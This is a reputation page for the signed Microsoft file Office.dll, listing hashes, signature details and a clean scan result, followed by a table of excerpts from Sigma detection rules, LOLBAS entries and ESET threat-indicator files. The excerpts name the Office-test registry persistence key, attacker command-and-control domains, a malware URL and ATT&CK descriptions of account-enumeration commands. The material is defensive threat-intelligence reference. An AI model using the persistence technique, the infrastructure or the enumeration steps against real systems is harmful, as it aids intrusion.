Office.dll
- File Path: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dll
- Description: Microsoft.Office.Core
Hashes
Type | Hash |
---|---|
MD5 | 57FDD8BE6071DFC46128DCCAD5E25863 |
SHA1 | F0601F41B06D836183442FE98BECD84400CF98D1 |
SHA256 | 0194C022C826D59407487096D208896A2465BA1A4C58EAC1D1AB96D9C2376A7E |
SHA384 | D12328D6134315401A6BC7EA0D59409358ABCB06A5C9A4EB8B1FB9C7A1B8E6FC76C0308716DC25CB15E6FCDAA7F01D8C |
SHA512 | C9C44F63862EE6BE2C02489E6AC2DBEE91990734912809A94C73B38DFCCAF98B63F309CE75BE64631CB696788981738400B1C45DFA6872AC552B4BBD6B0E6E2C |
SSDEEP | 12288:vsVUG62f8eQPrlGC9uk9IsbVYVsTEVcyjlycUn8:vsVUG62f8eQPrjY6VYViEX |
IMP | DAE02F32A21E03CE65412F6E56942DAA |
PESHA1 | FC44CD355B0011F7C2864B1C1F3D9EF2590AAAC1 |
PE256 | 813E1FECE65C0944DE77F774604470178AE47ACFB8CDAB1CDE43975566AE4C03 |
Signature
- Status: Signature verified.
- Serial: 330000010A2C79AED7797BA6AC00010000010A
- Thumbprint: 3BDA323E552DB1FDE5F4FBEE75D6D5B2B187EEDC
- Issuer: CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: Core Primary Interop Assembly
- Product Name: Microsoft Office 2010
- Company Name: Microsoft Corporation
- File Version: 14.0.4733.1000
- Product Version: 14.0.4733.1000
- Language: Language Neutral
- Legal Copyright: 2010 Microsoft Corporation. All rights reserved.
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/72
- VirusTotal Link: https://www.virustotal.com/gui/file/0194c022c826d59407487096d208896a2465ba1a4c58eac1d1ab96d9c2376a7e/detection/
Possible Misuse
The following table contains possible examples of Office.dll being misused. While Office.dll is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | godmode_sigma_rule.yml | # Office Dropper Detection | DRL 1.0 |
sigma | proxy_ua_apt.yml | - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html | DRL 1.0 |
sigma | sysmon_office_persistence.yml | title: Microsoft Office Add-In Loading | DRL 1.0 |
sigma | sysmon_susp_office_dotnet_assembly_dll_load.yml | title: dotNET DLL Loaded Via Office Applications | DRL 1.0 |
sigma | sysmon_susp_office_dotnet_assembly_dll_load.yml | description: Detects any assembly DLL being loaded by an Office Product | DRL 1.0 |
sigma | sysmon_susp_office_dotnet_clr_dll_load.yml | title: CLR DLL Loaded Via Office Applications | DRL 1.0 |
sigma | sysmon_susp_office_dotnet_clr_dll_load.yml | description: Detects CLR DLL being loaded by an Office Product | DRL 1.0 |
sigma | sysmon_susp_office_dotnet_gac_dll_load.yml | title: GAC DLL Loaded Via Office Applications | DRL 1.0 |
sigma | sysmon_susp_office_dotnet_gac_dll_load.yml | description: Detects any GAC DLL being loaded by an Office Product | DRL 1.0 |
sigma | sysmon_susp_office_dsparse_dll_load.yml | title: Active Directory Parsing DLL Loaded Via Office Applications | DRL 1.0 |
sigma | sysmon_susp_office_dsparse_dll_load.yml | description: Detects DSParse DLL being loaded by an Office Product | DRL 1.0 |
sigma | sysmon_susp_office_kerberos_dll_load.yml | title: Active Directory Kerberos DLL Loaded Via Office Applications | DRL 1.0 |
sigma | sysmon_susp_office_kerberos_dll_load.yml | description: Detects Kerberos DLL being loaded by an Office Product | DRL 1.0 |
sigma | sysmon_malware_verclsid_shellcode.yml | description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro | DRL 1.0 |
sigma | sysmon_malware_verclsid_shellcode.yml | SourceImage: '*\Microsoft Office\\*' | DRL 1.0 |
sigma | win_exploit_cve_2017_11882.yml | - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw | DRL 1.0 |
sigma | win_office_shell.yml | title: Microsoft Office Product Spawning Windows Shell | DRL 1.0 |
sigma | win_office_spawn_exe_from_users_directory.yml | title: MS Office Product Spawning Exe in User Dir | DRL 1.0 |
sigma | win_susp_msoffice.yml | title: Malicious Payload Download via Office Binaries | DRL 1.0 |
sigma | win_susp_msoffice.yml | - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 | DRL 1.0 |
sigma | sysmon_office_test_regadd.yml | title: Office Application Startup - Office Test | DRL 1.0 |
sigma | sysmon_office_test_regadd.yml | description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed everytime an Office application is started | DRL 1.0 |
sigma | sysmon_office_test_regadd.yml | - 'HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf' | DRL 1.0 |
sigma | sysmon_office_test_regadd.yml | - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf' | DRL 1.0 |
sigma | sysmon_reg_office_security.yml | title: Office Security Settings Changed | DRL 1.0 |
sigma | sysmon_reg_office_security.yml | description: Detects registry changes to Office macro settings | DRL 1.0 |
LOLBAS | Winword.yml | Description: Document editor included with Microsoft Office. | |
LOLBAS | Winword.yml | - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | |
LOLBAS | Appvlp.yml | Description: Application Virtualization Utility Included with Microsoft Office 2016 | |
LOLBAS | Appvlp.yml | OperatingSystem: Windows 10 w/Office 2016 | |
LOLBAS | Appvlp.yml | - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe | |
LOLBAS | Appvlp.yml | - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe | |
LOLBAS | Appvlp.yml | - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ | |
LOLBAS | Excel.yml | Description: Microsoft Office binary | |
LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe | |
LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe | |
LOLBAS | Excel.yml | - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 | |
LOLBAS | Powerpnt.yml | Description: Microsoft Office binary. | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe | |
LOLBAS | Powerpnt.yml | - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 | |
LOLBAS | Sqldumper.yml | - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe | |
LOLBAS | Winword.yml | Description: Microsoft Office binary | |
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office16\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office15\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office14\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe | |
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office12\winword.exe | |
LOLBAS | Winword.yml | - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 | |
malware-ioc | misp-dukes-operation-ghost-event.json | "Office Monkeys", | © ESET 2014-2018 |
malware-ioc | misp-dukes-operation-ghost-event.json | "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", | © ESET 2014-2018 |
malware-ioc | misp-dukes-operation-ghost-event.json | "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", | © ESET 2014-2018 |
malware-ioc | misp-dukes-operation-ghost-event.json | "https://www.uperesia.com/analyzing-malicious-office-documents" | © ESET 2014-2018 |
malware-ioc | misp-dukes-operation-ghost-event.json | "https://github.com/itsreallynick/office-crackros" | © ESET 2014-2018 |
malware-ioc | gamaredon | \| DFC941F365E065187B5C4A4BF42E770035920856\|C# Office macro injection module\|Win32/Pterodo.XG.gen | © ESET 2014-2018 |
malware-ioc | gamaredon | \| 9AFC9D6D72F78B2EB72C5F2B87BDC7D59C1A14ED\|Batch file/VBScript Office macro injection module\|Win32/Pterodo.ZM | © ESET 2014-2018 |
malware-ioc | gamaredon | office-constructor.ddns.net | © ESET 2014-2018 |
malware-ioc | interception | https://km.wu.ac[.]th/image/office.jpg | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "https://www.uperesia.com/analyzing-malicious-office-documents" | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "https://github.com/itsreallynick/office-crackros" | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "Office 365 account logs", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "Office 365", | © ESET 2014-2018 |
malware-ioc | misp_invisimole.json | "description": "Adversaries may attempt to get a listing of local system or domain accounts. \n\n### Windows\n\nExample commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.\n\n### Mac\n\nOn Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.\n\n### Linux\n\nOn Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.\n\nAlso, groups can be enumerated through the <code>groups</code> and <code>id</code> commands.\n\n### Office 365 and Azure AD\n\nWith authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)", | © ESET 2014-2018 |
malware-ioc | nouns.txt | office | © ESET 2014-2018 |
malware-ioc | oceanlotus-macOS.misp.event.json | "https:\/\/github.com\/itsreallynick\/office-crackros", | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "value": "office.ourkekwiciver.com", | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n===Browser-based Exploitation===\n\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n===Office Applications===\n\nCommon office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n===Common Third-party Applications===\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.\n\nDetection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, System calls, Process Monitoring\n\nSystem Requirements: Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.\n\nRemote Support: Yes", | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate\/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files\/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL\/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "https:\/\/github.com\/itsreallynick\/office-crackros"] | © ESET 2014-2018 |
malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\n\nDetection: Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway", | © ESET 2014-2018 |
malware-ioc | oceanlotus | * office.ourkekwiciver.com`` | © ESET 2014-2018 |
malware-ioc | 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc | - 18b7dd3917231d7bae93c11f915e9702aa5d1bbb - Office RCE | © ESET 2014-2018 |
malware-ioc | 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc | - HKCU\Software\Microsoft\Office test\Special\Perf\|%TEMP%\apisecconnect.dll`` | © ESET 2014-2018 |
malware-ioc | 2017-05-09_Trump_Attack_on_Syria_IoCs.json | "value": "HKCU\\Software\\Microsoft\\Office test\\Special\\Perf\|%TEMP%\\apisecconnect.dll", | © ESET 2014-2018 |
malware-ioc | part1.adoc | HKCU\Software\Microsoft\Office test\Special\Perf | © ESET 2014-2018 |
malware-ioc | stantinko | var b = "mts rt megafonpro megafon mpoisk mail google yandex ya rambler youtube dfiles turbobit prom zakupka pravo letitbit ozon urokitio kismia webnice toy mdmbank tele2 roboforex share4web 7do dixy kiino 4allforum delo-press raskachaem satu spmag yugcontract narodnoe materinstvo dimonvideo kia-club deal icloud littlebyte maxpark 24video vdgb trud appsruel tiu blanker aucland office ontabfile microsoft shopotam shareflare autoportal stilagoby malina depositfiles hitfile crocs telecom effectfree forum.calorizator.ru traektoria cdek takko circ-a tinydeal otzyv mamba rusfolder irn labirint vip-file 10.150.0.104".split(" "); | © ESET 2014-2018 |
malware-ioc | misp-mosquito-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
malware-ioc | misp-turla-comrat-v4-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
